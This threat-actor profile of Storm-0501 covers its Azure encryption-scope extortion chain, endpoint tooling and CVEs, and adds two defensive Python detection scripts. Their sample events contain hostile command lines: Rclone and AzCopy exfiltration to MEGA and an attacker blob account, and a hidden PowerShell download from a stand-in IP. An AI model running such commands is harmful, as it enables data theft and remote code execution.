Storm-0501
Storm-0501 is a financially motivated ransomware actor active since 2021. Microsoft and related reporting associate it with the Embargo ransomware operation, and Microsoft tracks Embargo under the Storm-0501 name. Before Embargo, the actor deployed Sabbath, Hive, BlackCat, Hunters International, and LockBit 3.0.

Recent intrusions span on-premises and hybrid, multi-tenant Azure environments, and the actor abuses both Windows and cloud resources within a single operation. Observed activity includes using compromised accounts to access Microsoft Entra Connect, signing in to the cloud environment with a victim Global Administrator account that had no MFA enforced, and using Storage Account Access Keys. In Azure-focused operations, Microsoft reported that Storm-0501 enumerated Entra ID tenants with AzureHound and abused Azure Storage encryption scopes to extort victims. The cloud chain runs: create a new Azure Key Vault, create a key in it, create an encryption scope backed by that key, encrypt the victim's data under the scope, delete the key or the vault so the data can no longer be read, and demand ransom.

On endpoints and internal networks, Storm-0501 performs discovery with native Windows tools and commands such as tasklist.exe and systeminfo, and with open-source tools including OSQuery and ossec-win32. Further reconnaissance and post-compromise tooling includes ADRecon.ps1, nltest, net group, sc query, and AzureHound. Credential access and privilege escalation activity includes Impacket SecretsDump, DCSync, KeePass credential theft, and brute-force attacks. For lateral movement, command and control, and persistence, the actor uses Cobalt Strike, Evil-WinRM, AnyDesk, NinjaOne, and Level.io. To deploy and persist, Storm-0501 registered a scheduled task named "SysUpdate" through a Group Policy Object to distribute the Embargo ransomware.
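The cloud chain described above lends itself to a sequence detection: each of the four control-plane steps is legitimate on its own, and it is their order, the single caller and the short time span that give the attack away. The script below is an added example, not Microsoft's, Mallory's or the actor's code. It assumes each log event has been flattened to `time|caller|operation|resource`, that the operation names listed in CHAIN are what Azure Activity and Key Vault diagnostic logs record for those steps (an assumption to verify against your own tenant), and the log lines are constructed.

```python
"""Correlate Azure log events into the cloud encryption chain attributed to Storm-0501.

Added example, not Microsoft's or Mallory's code. Events are assumed to be flattened
to `time|caller|operation|resource`. The operation names in CHAIN are the control-plane
and Key Vault data-plane names I expect in Azure Activity / Key Vault diagnostic logs
(assumption: verify in your tenant). The sample log is constructed.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Event:
    time: datetime
    caller: str
    operation: str
    resource: str


# Stages in the order the reporting describes: new vault -> new key ->
# encryption scope on a storage account -> key (or vault) destroyed.
# Compared case-insensitively.
CHAIN = (
    ("vault_create", {"microsoft.keyvault/vaults/write"}),
    ("key_create", {"keycreate"}),
    ("scope_create", {"microsoft.storage/storageaccounts/encryptionscopes/write"}),
    ("key_destroy", {"keydelete", "microsoft.keyvault/vaults/delete"}),
)

SUB = "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-prod/providers"

# Constructed sample log (not real telemetry). The first caller rotates a key inside an
# existing vault (benign); the second walks the whole chain within a few hours.
SAMPLE_LOG = f"""\
2025-08-20T01:02:00|svc-backup@contoso.example|KeyCreate|{SUB}/Microsoft.KeyVault/vaults/kv-backup/keys/rot-2025
2025-08-20T01:03:00|svc-backup@contoso.example|KeyDelete|{SUB}/Microsoft.KeyVault/vaults/kv-backup/keys/rot-2024
2025-08-20T02:10:00|ga-admin@contoso.example|Microsoft.KeyVault/vaults/write|{SUB}/Microsoft.KeyVault/vaults/kv-tmp9
2025-08-20T02:11:00|ga-admin@contoso.example|KeyCreate|{SUB}/Microsoft.KeyVault/vaults/kv-tmp9/keys/k1
2025-08-20T02:20:00|ga-admin@contoso.example|Microsoft.Storage/storageAccounts/encryptionScopes/write|{SUB}/Microsoft.Storage/storageAccounts/prodblob/encryptionScopes/es1
2025-08-20T05:40:00|ga-admin@contoso.example|KeyDelete|{SUB}/Microsoft.KeyVault/vaults/kv-tmp9/keys/k1
"""


def parse_log(text):
    """Parse the flattened log format into Event records, skipping blank lines."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        t, caller, op, res = line.split("|", 3)
        events.append(Event(datetime.fromisoformat(t), caller, op, res))
    return events


def find_chains(events, window_hours=6):
    """Return one finding per completed, in-order chain by a single caller, where every
    stage happens within `window_hours` of the vault creation. Partial or out-of-order
    sequences (ordinary key rotation, a scope created without a fresh vault) are not
    reported, which keeps routine Key Vault administration quiet."""
    window = timedelta(hours=window_hours)
    findings = []
    by_caller = {}
    for e in sorted(events, key=lambda e: e.time):
        by_caller.setdefault(e.caller, []).append(e)
    for caller, evs in by_caller.items():
        stage, matched = 0, []
        for e in evs:
            if matched and e.time - matched[0].time > window:
                stage, matched = 0, []  # window expired: this event may start a new chain
            if e.operation.lower() in CHAIN[stage][1]:
                matched.append(e)
                stage += 1
                if stage == len(CHAIN):
                    findings.append({
                        "caller": caller,
                        "start": matched[0].time,
                        "end": matched[-1].time,
                        "stages": {name: ev.resource for (name, _), ev in zip(CHAIN, matched)},
                    })
                    stage, matched = 0, []
    return findings


if __name__ == "__main__":
    for f in find_chains(parse_log(SAMPLE_LOG)):
        print(f"{f['caller']}: {f['start']:%H:%M} -> {f['end']:%H:%M}")
        for name, resource in f["stages"].items():
            print(f"  {name:13s} {resource}")
```

Because the destructive step is deleting the key or vault, Key Vault soft-delete with purge protection keeps a deleted key recoverable for the retention period and removes the extortion lever; this detection is the second layer, not the first. A looser variant that starts the chain at encryption-scope creation rather than vault creation catches an actor who reuses a vault the victim already owned, at the cost of more noise.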
Embargo's toolchain is written in Rust and consists of the Embargo payload, the MDeployer loader, and the MS4Killer EDR killer. MS4Killer uses a bring-your-own-vulnerable-driver (BYOVD) technique, loading probmon.sys to terminate security products. For exfiltration, Storm-0501 has uploaded stolen data to the MEGA file-sharing site, used Rclone to move data to cloud storage such as MegaSync, and used the AzCopy CLI to copy data to its own infrastructure. Embargo runs a double-extortion model: data is exfiltrated first, then files are encrypted. Microsoft also links Storm-0501 to Fox Tempest as a customer or affiliate that used malware signed through the Microsoft Artifact Signing service Fox Tempest abused. No aliases beyond Storm-0501 (normalized as storm_0501) are recorded here.
Tradecraft
58 distinct techniques observed across reporting, grouped by tactic (MITRE ATT&CK).
Associated malware families
20 malware families attributed to this actor across reporting.
Associated vulnerabilities
13 CVEs this actor has used in observed campaigns. 13 of them exploited in the wild.
Initial access (primary, Storm-0501): exploitation of known N-day vulnerabilities in internet-facing applications:
- CVE-2022-47966 (Zoho ManageEngine RCE)
- CVE-2023-29300 / CVE-2023-38203 (Adobe ColdFusion)
- CVE-2023-4966 (Citrix NetScaler, "Citrix Bleed")
Detection annotation (Explorer-launched shells): this detection identifies instances where Windows Explorer.exe spawns PowerShell or cmd.exe processes, particularly executions initiated by LNK files. The behavior is associated with the ZDI-CAN-25373 Windows shortcut zero-day vulnerability, in which specially crafted LNK files trigger malicious code execution through cmd.exe or powershell.exe. The technique has been actively exploited by multiple APT groups in targeted attacks, with the LNK files delivered over both HTTP and SMB.
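Most of the endpoint tradecraft in the profile (the GPO-delivered "SysUpdate" scheduled task, the probmon.sys driver load behind MS4Killer, Rclone and AzCopy pushing data to MEGA or actor-owned storage) and the Explorer-to-shell pattern in the LNK detection annotation above can be hunted from Windows Security and Sysmon telemetry with the same small rule framework. The script below is an added example, not Mallory's, Microsoft's or the detection vendor's logic. It assumes events have been flattened to dicts carrying the host, the channel, the event id and the standard Security 4698 / Sysmon event 1 and 6 field names; the sample events are constructed, and the `known_storage` allowlist is my assumption about how to separate the organisation's own blob storage from an actor's.

```python
"""Hunt flattened Windows telemetry for the Storm-0501 endpoint tradecraft in the profile.

Added example, not Mallory's or Microsoft's code. Events are dicts with host, channel
(Security or Sysmon), id, and the named fields of Security 4698 / Sysmon 1 and 6.
All sample events are constructed; the allowlist of corporate storage accounts is an
assumption about how a real deployment would suppress legitimate AzCopy traffic.
"""
import re
from collections import defaultdict

SAMPLE_EVENTS = [
    # Scheduled task pushed by GPO, using the task name from the reporting.
    {"host": "WS-117", "channel": "Security", "id": 4698, "TaskName": "\\SysUpdate",
     "TaskContent": "<Exec><Command>\\\\dc01\\SYSVOL\\corp.example\\scripts\\win.exe</Command></Exec>"},
    # Driver load of the file name MS4Killer's BYOVD technique relies on.
    {"host": "WS-117", "channel": "Sysmon", "id": 6,
     "ImageLoaded": "C:\\Windows\\Temp\\probmon.sys", "Signed": "true"},
    # Rclone pushing a share to a MEGA remote.
    {"host": "WS-117", "channel": "Sysmon", "id": 1, "Image": "C:\\Users\\Public\\rclone.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "rclone.exe copy D:\\Finance mega:exfil --transfers 16"},
    # AzCopy to a storage account that is not on the allowlist.
    {"host": "SRV-FS01", "channel": "Sysmon", "id": 1, "Image": "C:\\Temp\\azcopy.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "azcopy copy E:\\Shares https://attackerstor.blob.core.windows.net/in --recursive"},
    # AzCopy to the corporate backup account: expected traffic.
    {"host": "SRV-BK01", "channel": "Sysmon", "id": 1, "Image": "C:\\Program Files\\Backup\\azcopy.exe",
     "ParentImage": "C:\\Program Files\\Backup\\agent.exe",
     "CommandLine": "azcopy sync E:\\Backups https://corpbackup01.blob.core.windows.net/daily"},
    # LNK-style launch: Explorer spawning a shell whose arguments are hidden behind padding.
    {"host": "WS-042", "channel": "Sysmon", "id": 1, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "cmd.exe" + " " * 40 + "/c powershell -w hidden -c iwr http://203.0.113.9/s.ps1"},
    # A user opening a prompt from the desktop: same parent/child pair, no arguments.
    {"host": "WS-042", "channel": "Sysmon", "id": 1, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"C:\\Windows\\System32\\cmd.exe\""},
    # Benign scheduled task created by Windows Update.
    {"host": "WS-042", "channel": "Security", "id": 4698,
     "TaskName": "\\Microsoft\\Windows\\UpdateOrchestrator\\Schedule Scan",
     "TaskContent": "<Exec><Command>%systemroot%\\system32\\usoclient.exe</Command></Exec>"},
]

EXFIL_TOOL_RE = re.compile(r"\\(rclone|azcopy)\.exe$", re.I)
BLOB_HOST_RE = re.compile(r"https://([a-z0-9]+\.blob\.core\.windows\.net)", re.I)
MEGA_RE = re.compile(r"\bmega(?::|\.nz\b|sync\b)", re.I)
SHELL_RE = re.compile(r"\\(cmd|powershell|pwsh)\.exe$", re.I)
# First token (quoted or bare) is the image; group 1 is whatever follows it.
ARGS_RE = re.compile(r'^(?:"[^"]*"|\S+)\s*(\S.*)?$', re.S)


def is_proc(e, image_re):
    return e["channel"] == "Sysmon" and e["id"] == 1 and bool(image_re.search(e.get("Image", "")))


def gpo_task_sysupdate(e, _known):
    return e["channel"] == "Security" and e["id"] == 4698 and e.get("TaskName", "").strip("\\").lower() == "sysupdate"


def byovd_probmon_driver(e, _known):
    return e["channel"] == "Sysmon" and e["id"] == 6 and e.get("ImageLoaded", "").lower().endswith("\\probmon.sys")


def exfil_tool_to_untrusted_cloud(e, known_storage):
    """Rclone/AzCopy process whose command line names a MEGA remote or a blob account
    that is not in the allowlist."""
    if not is_proc(e, EXFIL_TOOL_RE):
        return False
    cmd = e.get("CommandLine", "")
    if MEGA_RE.search(cmd):
        return True
    return any(h.lower() not in known_storage for h in BLOB_HOST_RE.findall(cmd))


def explorer_spawns_shell(e, _known):
    """explorer.exe -> cmd/powershell with arguments; a bare prompt launch is ignored."""
    if not is_proc(e, SHELL_RE) or not e.get("ParentImage", "").lower().endswith("\\explorer.exe"):
        return False
    m = ARGS_RE.match(e.get("CommandLine", "").strip())
    return bool(m and m.group(1))


RULES = [gpo_task_sysupdate, byovd_probmon_driver, exfil_tool_to_untrusted_cloud, explorer_spawns_shell]


def hunt(events, known_storage=frozenset()):
    known = {h.lower() for h in known_storage}
    return [{"rule": r.__name__, "host": e["host"], "event": e} for e in events for r in RULES if r(e, known)]


def triage(findings, min_rules=2):
    """Hosts on which at least `min_rules` distinct rules fired, with the rule names."""
    per_host = defaultdict(set)
    for f in findings:
        per_host[f["host"]].add(f["rule"])
    return {h: sorted(rules) for h, rules in per_host.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS, known_storage={"corpbackup01.blob.core.windows.net"})
    for f in found:
        print(f"{f['host']:9s} {f['rule']}")
    print("escalate:", triage(found))
```

The Explorer-to-shell rule only fires when the shell receives arguments, because a user opening a prompt from the desktop produces the same parent/child pair with a bare command line; the sample's padded arguments mimic how I assume the hidden shortcut arguments reported for ZDI-CAN-25373 would appear in process telemetry. Rclone and AzCopy are both legitimate tools, so the allowlist of corporate storage accounts matters more than the binary name, and `triage` escalates only hosts where two or more independent rules fire.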
Observables
3 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
20 sources tracked across advisories, community write-ups, and news.
Abused Azure encryption scopes and Key Vault keys post-compromise to render victim storage data inaccessible and demand ransom.
Listed as an associated threat actor in the detection annotation for exploitation of the public-facing PTC Windchill vulnerability CVE-2026-4681.
Named by Microsoft as a customer of Fox Tempest's fraudulent signing service that used malware signed through it.